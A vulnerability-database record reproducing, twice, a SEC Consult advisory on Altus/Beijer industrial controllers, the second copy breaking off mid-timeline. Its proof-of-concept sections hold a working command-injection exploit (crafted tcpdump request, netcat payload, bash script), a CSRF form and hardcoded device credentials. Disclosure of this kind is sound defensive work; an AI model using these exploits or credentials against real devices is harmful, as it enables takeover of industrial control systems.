{"packetstorm": [{"lastseen": "2021-08-19T17:23:50", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T00:00:00", "type": "packetstorm", "title": "Altus Sistemas de Automacao Products CSRF / Command Injection / Hardcoded Credentials", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16544", "CVE-2021-39243", "CVE-2021-39244", "CVE-2021-39245"], "modified": "2021-08-19T00:00:00", "id": "PACKETSTORM:163889", "href": "https://packetstormsecurity.com/files/163889/Altus-Sistemas-de-Automacao-Products-CSRF-Command-Injection-Hardcoded-Credentials.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20210819-0 > \n======================================================================= \ntitle: Multiple Critical Vulnerabilities \nproduct: Multiple Altus Sistemas de Automacao products: \nNexto NX30xx Series \nNexto NX5xxx Series \nNexto Xpress XP3xx Series \nHadron Xtorm HX3040 Series \nvulnerable version: See \"Vulnerable / tested versions\" \nfixed version: See \"Solution\" \nCVE number: CVE-2021-39243, CVE-2021-39243, CVE-2021-39243 \nimpact: Critical \nhomepage: 
https://www.altus.com.br/ \nfound: 2020-05-20 \nby: D. Teuchert \nT. Weber (Office Vienna) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult, an Atos company \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"As a reference for the automation market for more than 35 years, Altus \nSistemas de Automa\u00e7\u00e3o S.A. offers a complete line of products that meet a wide \nrange of customers\u2019 needs in several areas of the domestic and international \nmarkets. Developed with own technology, our solutions deliver high added value \nto our customers businesses, enabling productivity, safety and reliability for \nindustrial automation applications and industrial automation processes. \n \nWe are a member of Parit Participa\u00e7\u00f5es, a holding company in the technology \nsector, which also controls Teikon S.A., a company with operations on the \nelectronic manufacturing market, and RT Tecnologia M\u00e9dica, a company that \noperates in the radiological market.\" \n \nSource: https://www.altus.com.br/sobre \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patch which should be installed immediately. \n \nSEC Consult recommends to perform a thorough security review of these \nproducts conducted by security professionals to identify and resolve all \nsecurity issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244) \nThe getlogs.cgi script allows authenticated users to start tcpdump on the \ndevice. By injecting payloads into specific parameters it is also possible to \nexecute arbitrary OS commands. The output of these commands can be obtained in \nanother step. 
\n \n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243) \nThe web interface that is used to set all configurations is vulnerable to \ncross-site request forgery attacks. An attacker can change settings this way by \nluring the victim to a malicious website. \n \n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245) \nThe getlogs.cgi script is exclusively htaccess-protected with hardcoded \ncredentials. These are shared with all firmware images from the series NX30xx, \nHX30xx and XP3xx. These hardcoded credentials can be used to access the device \nwithout a valid user account on application level and cannot be changed in the \nuser interface. \n \nIn combination with vulnerability 1), a full compromization on system level \nwith the only precondition of network access can be done. \n \n4) Outdated and Vulnerable Software Components \nA static scan with the IoT Inspector revealed outdated software packages that \nare used in the devices' firmware. \n \nThe used BusyBox toolkit is outdated and contains multiple known \nvulnerabilities. The outdated version was found by IoT Inspector. One of the \ndiscovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA \nscalable firmware runtime. \n \n \nProof of concept: \n----------------- \n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244) \nThe following firmware extract of getlogs.cgi displays the vulnerability: \n------------------------------------------------------------------------------- \nTCPDUMP_IFACE=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_iface=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"` \nTCPDUMP_COUNT=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_count=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"` \n[...] 
\necho \"tcpdump is running ...\" \necho \"<p>Please, wait the capture of $TCPDUMP_COUNT packets in $TCPDUMP_IFACE.</p>\" \nchrt -p -f 70 $$ \ntcpdump -i $TCPDUMP_IFACE -c $TCPDUMP_COUNT -w /tmp/capture.pcap \nmount / -o rw,remount \nln -s /tmp/capture.pcap /usr/www/capture.pcap \nmount / -o ro,remount \necho \"<a href=\\\"capture.pcap\\\" download=\\\"$TCPDUMP_IFACE-capture.pcap\\\">Click here to download the capture file</a>\" \n------------------------------------------------------------------------------- \nAs it can be seen, the variables $TCPDUMP_COUNT and $TCPDUMP_IFACE are used \nunfiltered in the tcpdump command. This means, that it is possible to inject \narbitrary parameters to the tcpdump command. The flag -z for tcpdump allows to \ndefine a program that will run on the capture file. This behaviour can be used \nto execute arbitrary commands. The following request injects parameters, so \nthat tcpdump listens on UDP port 1234 and will execute the capture file with \nsh: \n------------------------------------------------------------------------------- \nGET /getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%201234 HTTP/1.1 \nHost: $IP \nAuthorization: Basic YWx0dXM6bmV4dG8xMjM0 \n \n------------------------------------------------------------------------------- \nThe next step to exploit this vulnerability is to send the commands to UDP port \n1234: \n \n$ echo -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT \n \nThe command is sent twice because it is possible, that the capture file \ncontains a \"'\" before the sent payload. Injecting the commands twice with a \"'\" \nin between makes sure, that the command will be executed by sh and not \ninterpreted as a string. 
The output of the executed command is redirected to \nthe file capture.pcap which can be accessed via the following request: \n------------------------------------------------------------------------------- \nGET /capture.pcap HTTP/1.1 \nHost: $IP \n------------------------------------------------------------------------------- \nThese three steps are combined in the following proof of concept script: \n------------------------------------------------------------------------------- \n#!/bin/bash \n#Author: D. Teuchert \nCMD=\"whoami\" \nif [[ $# -eq 1 ]]; then \nCMD=$1 \nfi \nTARGET_HOST=\"192.168.100.123\" \nUDP_PORT=1234 \nBASIC_AUTH_USERNAME=\"altus\" \nBASIC_AUTH_PASSWORD=\"nexto1234\" \nBASIC_AUTH_HEADER=$(printf \"$BASIC_AUTH_USERNAME:$BASIC_AUTH_PASSWORD\" | base64) \n \n#Sending HTTP request with parameter injection in tcpdump \n#Break out of tcpdump is done via a technique described here: \n#https://insinuator.net/2019/07/how-to-break-out-of-restricted-shells-with-tcpdump/ \ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" -H \"Authorization: Basic $BASIC_AUTH_HEADER\" \"http://$TARGET_HOST/getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%20$UDP_PORT\">/dev/null & \n#Send udp packet with payload \necho -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT \necho -e \"Executed \\\"$CMD\\\".\\nResponse:\" \n#The output of the executed command was saved in capture.pcap \ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" \"http://$TARGET_HOST/capture.pcap\" \n------------------------------------------------------------------------------- \n \n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243) \nThe following CSRF proof-of-concept can be used to do the first step of the \ncommand Injection exploitation: \n------------------------------------------------------------------------------- \n<html> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form 
action=\"http://$IP/getlogs.cgi\"> \n<input type=\"hidden\" name=\"logtype\" value=\"tcpdump\" /> \n<input type=\"hidden\" name=\"tcpdump_iface\" value=\"eth0\" /> \n<input type=\"hidden\" name=\"tcpdump_count\" value=\"1 -G 1 -z sh -U -A udp port 1234\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n</body> \n</html> \n------------------------------------------------------------------------------- \n \n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245) \nThe hardcoded credentials are present under \"/etc/lighttpd/lighttpd-auth.conf\": \naltus:nexto1234 \n \nThese credentials are exclusively used for the getlogs.cgi script. This is also \ndescribed in the lighttpd.conf which is located under the same directory: \n------------------------------------------------------------------------------- \n[...] \nauth.debug = 0 \nauth.backend = \"plain\" \nauth.backend.plain.userfile = \"/etc/lighttpd/lighttpd-auth.conf\" \n \nauth.require = ( \"/cgi/getlogs.cgi\" => \n( \n\"method\" => \"basic\", \n\"realm\" => \"Password protected area\", \n\"require\" => \"user=altus\" \n) \n) \n[...] 
\n------------------------------------------------------------------------------- \n \n4) Outdated and Vulnerable Software Components \nBased on an automated scan with the IoT Inspector the following third party \nsoftware packages were found to be outdated: \n \nAltus/Beijer XP3xx: \nBusyBox 1.19.4 \nGNU glibc 2.19 \nlighttpd 1.4.30 \nLinux Kernel 4.9.98 \nOpenSSH 5.9p1 \nOpenSSL 1.0.0g \nOpenSSL 1.1.1b (in CODESYS) \nCODESYS Control 3.5.15 \n \nAltus/Beijer NX30xx: \nBusyBox 1.1.3 \nDropbear SSH 0.45 \nGNU glibc 2.5 \nlighttpd 1.4.24-devel-v1.0.0.7-1727-g6fd3998 \nLinux Kernel 2.6.23 \nOpenSSL 0.9.8g \nOpenSSL 1.1.1b (in CODESYS) \nCODESYS Control 3.5.15 \n \nAltus/Beijer HX30xx: \nBusyBox 1.19.4 \nGNU glibc 2.11.1 \nlighttpd 1.4.30 \nLinux Kernel 3.0.75 \nOpenSSH 5.9p1 \nOpenSSL 1.0.0g \nOpenSSL 1.0.2j (in CODESYS) \nCODESYS Control 3.5.12.65 \n \nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on \nan emulated device: \n \nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the \nvulnerability. \n------------------------------------------------------------------------------- \n# ls \"pressing <TAB>\" \ntest \n55\\;test.txt \n# \n------------------------------------------------------------------------------- \n \nThe vulnerabilities 1), 2), 3), 4) were manually verified on an emulated device \nby using the MEDUSA scalable firmware runtime. 
\n \nVulnerable / tested versions: \n----------------------------- \nThe following firmware versions have been found to be vulnerable: \nAltus/Beijer Nexto NX3003 / 1.8.11.0 \nAltus/Beijer Nexto NX3004 / 1.8.11.0 \nAltus/Beijer Nexto NX3005 / 1.8.11.0 \nAltus/Beijer Nexto NX3010 / 1.8.3.0 \nAltus/Beijer Nexto NX3020 / 1.8.3.0 \nAltus/Beijer Nexto NX3030 / 1.8.3.0 \nAltus/Beijer Nexto Xpress XP300 / 1.8.11.0 \nAltus/Beijer Nexto Xpress XP315 / 1.8.11.0 \nAltus/Beijer Nexto Xpress XP325 / 1.8.11.0 \nAltus/Beijer Nexto Xpress XP340 / 1.8.11.0 \nAltus/Beijer Hadron Xtorm HX3040 / 1.7.58.0 \n \nThe following versions are also vulnerable according to the vendor: \nAltus/Beijer Nexto NX5100 / 1.8.11.0 \nAltus/Beijer Nexto NX5101 / 1.8.11.0 \nAltus/Beijer Nexto NX5110 / 1.1.2.8 \nAltus/Beijer Nexto NX5210 / 1.1.2.8 \n \nVendor contact timeline: \n------------------------ \n2020-05-25: Contacting VDE CERT through info@cert.vde.com. Received \nconfirmation from VDE CERT. \n2020-05-01 - 2020-09-01: Multiple emails and telephone calls with VDE CERT. \nVDE CERT contacts said, that the vendor did not respond on any \nmessages or calls. \n2020-09-30: Wrote a message to the SVP R&D and Supply Chain of Beijer \nElectronics. No answer. \n2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated \nthat no case regarding vulnerabilities were opened and created one. \nThe product owners of Westermo, Korenix and Beijer Electronics were \ninformed via this inquiry. Set disclosure date to 2020-11-25. \n2020-10-06: Restarted the whole responsible disclosure process by sending a \nrequest to the new security contact cs@beijerelectronics.com. \n2020-11-11: Asked the representatives of Korenix and Beijer regarding the \nstatus. No answer. \n2020-11-25: Phone call with security manager of Beijer. Sent advisories via \nencrypted archive to cs@beijerelectronics.com. Received \nconfirmation of advisory receipt. 
Security manager told us that he \ncan provide information regarding the time-line for the patches \nwithin the next two weeks. \n2020-12-09: Asked for an update. \n2020-12-18: Call with security manager of Beijer. Vendor presented initial \nanalysis done by the affected companies, also Altus. Preliminary \nplans to fix the vulnerabilities were presented. Altus stated to \nfix issue #1 in January and the other vulnerabilities in March or \nApril. \n2021-03-21: Security manager invited SEC Consult to have a status meeting. \n2021-03-25: Altus fixed vulnerability #1. Handover of the advisory handling to \nAltus employees will be done in April. Vendor released fixed \nfirmware regarding issue #1. \n2021-04-09: Meeting with Altus. Vendor did not agree with another potentially \nvulnerability, which was identified on the emulated device. Thus, \nit was removed from the advisory. Vulnerabilities #2 and #3 were \nplanned to be fixed earlier this year but the releases shifted due \nto Covid. The new firmware version will be released in July 2021. \n2021-04-22: Asked for an update; No answer. \n2021-05-04: Asked for an update. \n2021-05-07: Vendor was working on the security fixes. \n2021-05-11: Vendor sent timeline for fixes and detailed version information. \nTwo additional models were added to the affected devices by the \nvendor. \n2021-06-10: Added additional information and asked if more time will be needed. \n2021-06-10: Vendor added affected version numbers and asked for the 1st of \nAugust as new release date. \n2021-06-15: Set the release date to 1st of August. \n2021-07-28: Vendor sent the version numbers for the fixed firmware and asked \nfor postponing the release to 6th of August for completing the \ndocumentation. \n2021-08-16: Due to holiday, the SEC Consult Vulnerability was closed. Informed \nvendor to release the advisory in the next four days. \n2021-08-17: Received CVE IDs. \n2021-08-18: Informed vendor to release the advisory on 2021-08-19. 
\n2021-08-19: Coordinated release of security advisory. \n \nSolution: \n--------- \nAccording to the vendor the following patches must be applied to fix issue 1), \n2) and 3): \n \nXP300 - v1.11.2.0 \nXP315 - v1.11.2.0 \nXP325 - v1.11.2.0 \nXP340 - v1.11.2.0 \nBCS-NX3003 - v1.11.2.0 \nBCS-NX3004 - v1.11.2.0 \nBCS-NX3005 - v1.11.2.0 \nBCS-NX3010 - v1.9.1.0 \nBCS-NX3020 - v1.9.1.0 \nBCS-NX3030 - v1.9.1.0 \nBCS-NX5100 - v1.11.2.0 \nBCS-NX5101 - v1.11.2.0 \nBCS-NX5110 - v1.11.2.0 \nBCS-NX5210 - v1.11.2.0 \nBCS-HX3040 - v1.11.2.0 \n \nVendor's statement regarding issue 4): \n\"Altus continuously integrates new features and fixes in the products, \nreleasing new firmware versions. Often those improvements require the software \npackages upgrading for several reasons, including security. When this happens, \nwe perform a set of tests to ensure that the performance, reliability, and \nsecurity were not negatively impacted by the upgrades. Although there are known \nvulnerabilities in some software package versions, those vulnerabilities can \nonly be exploited if we compile those specific features and provide the means \nto exploit them. The issue pointed out by SEC Consult, for instance, requires a \nterminal to be exploited, which we don't provide in real hardware. Nowadays, \nthere isn't any known exploitable vulnerability caused by outdated software \npackages in our products. Therefore, this item isn\u2019t considered a vulnerability \nby us.\" \n \n \nWorkaround: \n----------- \nRestrict network access to the device. \n \n \nAdvisory URL: \n------------- \nhttps://sec-consult.com/vulnerability-lab/ \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nSEC Consult Vulnerability Lab \n \nSEC Consult, an Atos company \nEurope | Asia | North America \n \nAbout SEC Consult Vulnerability Lab \nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an \nAtos company. 
It ensures the continued knowledge gain of SEC Consult in the \nfield of network and application security to stay ahead of the attacker. The \nSEC Consult Vulnerability Lab supports high-quality penetration testing and \nthe evaluation of new offensive and defensive technologies for our customers. \nHence our customers obtain the most current information about vulnerabilities \nand valid recommendation about the risk profile of new technologies. \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nInterested to work with the experts of SEC Consult? \nSend us your application https://sec-consult.com/career/ \n \nInterested in improving your cyber security with the experts of SEC Consult? \nContact our local offices https://sec-consult.com/contact/ \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nEOF Daniel Teuchert, Thomas Weber / @2021 \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163889/SA-20210819-0.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-20T17:33:51", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T00:00:00", "type": "zdt", "title": "Altus Sistemas de Automacao Products CSRF / Command Injection / Hardcoded Credentials Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39243", "CVE-2021-39245", "CVE-2017-16544", "CVE-2021-39244"], "modified": "2021-08-19T00:00:00", "id": "1337DAY-ID-36662", "href": "https://0day.today/exploit/description/36662", "sourceData": "=======================================================================\n title: Multiple Critical Vulnerabilities\n product: Multiple Altus Sistemas de Automacao products:\n Nexto NX30xx Series\n Nexto NX5xxx Series\n Nexto Xpress XP3xx Series\n Hadron Xtorm HX3040 Series\n vulnerable version: See \"Vulnerable / tested versions\"\n fixed version: See \"Solution\"\n CVE number: CVE-2021-39243, CVE-2021-39243, CVE-2021-39243\n impact: Critical\n homepage: https://www.altus.com.br/\n by: D. Teuchert\n T. Weber (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"As a reference for the automation market for more than 35 years, Altus\nSistemas de Automa\u00e7\u00e3o S.A. offers a complete line of products that meet a wide\nrange of customers\u2019 needs in several areas of the domestic and international\nmarkets. 
Developed with own technology, our solutions deliver high added value\nto our customers businesses, enabling productivity, safety and reliability for\nindustrial automation applications and industrial automation processes.\n\nWe are a member of Parit Participa\u00e7\u00f5es, a holding company in the technology\nsector, which also controls Teikon S.A., a company with operations on the\nelectronic manufacturing market, and RT Tecnologia M\u00e9dica, a company that\noperates in the radiological market.\"\n\nSource: https://www.altus.com.br/sobre\n\nBusiness recommendation:\n------------------------\nThe vendor provides a patch which should be installed immediately.\n\nSEC Consult recommends to perform a thorough security review of these\nproducts conducted by security professionals to identify and resolve all\nsecurity issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244)\nThe getlogs.cgi script allows authenticated users to start tcpdump on the\ndevice. By injecting payloads into specific parameters it is also possible to\nexecute arbitrary OS commands. The output of these commands can be obtained in\nanother step.\n\n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243)\nThe web interface that is used to set all configurations is vulnerable to\ncross-site request forgery attacks. An attacker can change settings this way by\nluring the victim to a malicious website.\n\n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245)\nThe getlogs.cgi script is exclusively htaccess-protected with hardcoded\ncredentials. These are shared with all firmware images from the series NX30xx,\nHX30xx and XP3xx. 
These hardcoded credentials can be used to access the device\nwithout a valid user account on application level and cannot be changed in the\nuser interface.\n\nIn combination with vulnerability 1), a full compromization on system level\nwith the only precondition of network access can be done.\n\n4) Outdated and Vulnerable Software Components\nA static scan with the IoT Inspector revealed outdated software packages that\nare used in the devices' firmware.\n\nThe used BusyBox toolkit is outdated and contains multiple known\nvulnerabilities. The outdated version was found by IoT Inspector. One of the\ndiscovered vulnerabilities (CVE-2017-16544) was verified by using the MEDUSA\nscalable firmware runtime.\n\n\nProof of concept:\n-----------------\n1) Authenticated Semi-Blind Command Injection via Parameter Injection (CVE-2021-39244)\nThe following firmware extract of getlogs.cgi displays the vulnerability:\n-------------------------------------------------------------------------------\nTCPDUMP_IFACE=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_iface=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"`\nTCPDUMP_COUNT=`echo \"$QUERY_STRING\" | sed -n 's/^.*tcpdump_count=\\([^&]*\\).*$/\\1/p' | sed \"s/%20/ /g\"`\n[...]\necho \"tcpdump is running ...\"\necho \"<p>Please, wait the capture of $TCPDUMP_COUNT packets in $TCPDUMP_IFACE.</p>\"\nchrt -p -f 70 $$\ntcpdump -i $TCPDUMP_IFACE -c $TCPDUMP_COUNT -w /tmp/capture.pcap\nmount / -o rw,remount\nln -s /tmp/capture.pcap /usr/www/capture.pcap\nmount / -o ro,remount\necho \"<a href=\\\"capture.pcap\\\" download=\\\"$TCPDUMP_IFACE-capture.pcap\\\">Click here to download the capture file</a>\"\n-------------------------------------------------------------------------------\nAs it can be seen, the variables $TCPDUMP_COUNT and $TCPDUMP_IFACE are used\nunfiltered in the tcpdump command. This means, that it is possible to inject\narbitrary parameters to the tcpdump command. 
The flag -z for tcpdump allows to\ndefine a program that will run on the capture file. This behaviour can be used\nto execute arbitrary commands. The following request injects parameters, so\nthat tcpdump listens on UDP port 1234 and will execute the capture file with\nsh:\n-------------------------------------------------------------------------------\nGET /getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%201234 HTTP/1.1\nHost: $IP\nAuthorization: Basic YWx0dXM6bmV4dG8xMjM0\n\n-------------------------------------------------------------------------------\nThe next step to exploit this vulnerability is to send the commands to UDP port\n1234:\n\n$ echo -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT\n\nThe command is sent twice because it is possible, that the capture file\ncontains a \"'\" before the sent payload. Injecting the commands twice with a \"'\"\nin between makes sure, that the command will be executed by sh and not\ninterpreted as a string. The output of the executed command is redirected to\nthe file capture.pcap which can be accessed via the following request:\n-------------------------------------------------------------------------------\nGET /capture.pcap HTTP/1.1\nHost: $IP\n-------------------------------------------------------------------------------\nThese three steps are combined in the following proof of concept script:\n-------------------------------------------------------------------------------\n#!/bin/bash\n#Author: D. 
Teuchert\nCMD=\"whoami\"\nif [[ $# -eq 1 ]]; then\n CMD=$1\nfi\nTARGET_HOST=\"192.168.100.123\"\nUDP_PORT=1234\nBASIC_AUTH_USERNAME=\"altus\"\nBASIC_AUTH_PASSWORD=\"nexto1234\"\nBASIC_AUTH_HEADER=$(printf \"$BASIC_AUTH_USERNAME:$BASIC_AUTH_PASSWORD\" | base64)\n\n#Sending HTTP request with parameter injection in tcpdump\n#Break out of tcpdump is done via a technique described here:\n#https://insinuator.net/2019/07/how-to-break-out-of-restricted-shells-with-tcpdump/\ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" -H \"Authorization: Basic $BASIC_AUTH_HEADER\" \"http://$TARGET_HOST/getlogs.cgi?logtype=tcpdump&tcpdump_iface=eth0&tcpdump_count=1%20-G%201%20-z%20sh%20-U%20-A%20udp%20port%20$UDP_PORT\">/dev/null &\n#Send udp packet with payload\necho -e \";\\n$CMD &>/tmp/capture.pcap;\\n'\\n$CMD &>/tmp/capture.pcap;\" | nc -u $TARGET_HOST $UDP_PORT\necho -e \"Executed \\\"$CMD\\\".\\nResponse:\"\n#The output of the executed command was saved in capture.pcap\ncurl -s -k -X \"GET\" -H \"Host: $TARGET_HOST\" \"http://$TARGET_HOST/capture.pcap\"\n-------------------------------------------------------------------------------\n\n2) Cross-Site Request Forgery (CSRF) (CVE-2021-39243)\nThe following CSRF proof-of-concept can be used to do the first step of the\ncommand Injection exploitation:\n-------------------------------------------------------------------------------\n<html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"http://$IP/getlogs.cgi\">\n <input type=\"hidden\" name=\"logtype\" value=\"tcpdump\" />\n <input type=\"hidden\" name=\"tcpdump_iface\" value=\"eth0\" />\n <input type=\"hidden\" name=\"tcpdump_count\" value=\"1 -G 1 -z sh -U -A udp port 1234\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n </body>\n</html>\n-------------------------------------------------------------------------------\n\n3) Hardcoded Credentials for CGI Endpoint (CVE-2021-39245)\nThe hardcoded credentials are present under 
\"/etc/lighttpd/lighttpd-auth.conf\":\naltus:nexto1234\n\nThese credentials are exclusively used for the getlogs.cgi script. This is also\ndescribed in the lighttpd.conf which is located under the same directory:\n-------------------------------------------------------------------------------\n[...]\nauth.debug = 0\nauth.backend = \"plain\"\nauth.backend.plain.userfile = \"/etc/lighttpd/lighttpd-auth.conf\"\n\nauth.require = ( \"/cgi/getlogs.cgi\" =>\n (\n \"method\" => \"basic\",\n \"realm\" => \"Password protected area\",\n \"require\" => \"user=altus\"\n )\n)\n[...]\n-------------------------------------------------------------------------------\n\n4) Outdated and Vulnerable Software Components\nBased on an automated scan with the IoT Inspector the following third party\nsoftware packages were found to be outdated:\n\nAltus/Beijer XP3xx:\nBusyBox 1.19.4\nGNU glibc 2.19\nlighttpd 1.4.30\nLinux Kernel 4.9.98\nOpenSSH 5.9p1\nOpenSSL 1.0.0g\nOpenSSL 1.1.1b (in CODESYS)\nCODESYS Control 3.5.15\n\nAltus/Beijer NX30xx:\nBusyBox 1.1.3\nDropbear SSH 0.45\nGNU glibc 2.5\nlighttpd 1.4.24-devel-v1.0.0.7-1727-g6fd3998\nLinux Kernel 2.6.23\nOpenSSL 0.9.8g\nOpenSSL 1.1.1b (in CODESYS)\nCODESYS Control 3.5.15\n\nAltus/Beijer HX30xx:\nBusyBox 1.19.4\nGNU glibc 2.11.1\nlighttpd 1.4.30\nLinux Kernel 3.0.75\nOpenSSH 5.9p1\nOpenSSL 1.0.0g\nOpenSSL 1.0.2j (in CODESYS)\nCODESYS Control 3.5.12.65\n\nThe BusyBox shell autocompletion vulnerability (CVE-2017-16544) was verified on\nan emulated device:\n\nA file with the name \"\\ectest\\n\\e]55;test.txt\\a\" was created to trigger the\nvulnerability.\n-------------------------------------------------------------------------------\n# ls \"pressing <TAB>\"\ntest\n55\\;test.txt\n#\n-------------------------------------------------------------------------------\n\nThe vulnerabilities 1), 2), 3), 4) were manually verified on an emulated device\nby using the MEDUSA scalable firmware runtime.\n\nVulnerable / tested 
versions:\n-----------------------------\nThe following firmware versions have been found to be vulnerable:\nAltus/Beijer Nexto NX3003 / 1.8.11.0\nAltus/Beijer Nexto NX3004 / 1.8.11.0\nAltus/Beijer Nexto NX3005 / 1.8.11.0\nAltus/Beijer Nexto NX3010 / 1.8.3.0\nAltus/Beijer Nexto NX3020 / 1.8.3.0\nAltus/Beijer Nexto NX3030 / 1.8.3.0\nAltus/Beijer Nexto Xpress XP300 / 1.8.11.0\nAltus/Beijer Nexto Xpress XP315 / 1.8.11.0\nAltus/Beijer Nexto Xpress XP325 / 1.8.11.0\nAltus/Beijer Nexto Xpress XP340 / 1.8.11.0\nAltus/Beijer Hadron Xtorm HX3040 / 1.7.58.0\n\nThe following versions are also vulnerable according to the vendor:\nAltus/Beijer Nexto NX5100 / 1.8.11.0\nAltus/Beijer Nexto NX5101 / 1.8.11.0\nAltus/Beijer Nexto NX5110 / 1.1.2.8\nAltus/Beijer Nexto NX5210 / 1.1.2.8\n\nVendor contact timeline:\n------------------------\n2020-05-25: Contacting VDE CERT through [email\u00a0protected] Received\n confirmation from VDE CERT.\n2020-05-01 - 2020-09-01: Multiple emails and telephone calls with VDE CERT.\n VDE CERT contacts said, that the vendor did not respond on any\n messages or calls.\n2020-09-30: Wrote a message to the SVP R&D and Supply Chain of Beijer\n Electronics. No answer.\n2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated\n that no case regarding vulnerabilities were opened and created one.\n The product owners of Westermo, Korenix and Beijer Electronics were\n informed via this inquiry. Set disclosure date to 2020-11-25.\n2020-10-06: Restarted the whole responsible disclosure process by sending a\n request to the new security contact [email\u00a0protected]\n2020-11-11: Asked the representatives of Korenix and Beijer regarding the\n status. No answer.\n2020-11-25: Phone call with security manager of Beijer. Sent advisories via\n encrypted archive to [email\u00a0protected] Received\n confirmation of advisory receipt. 
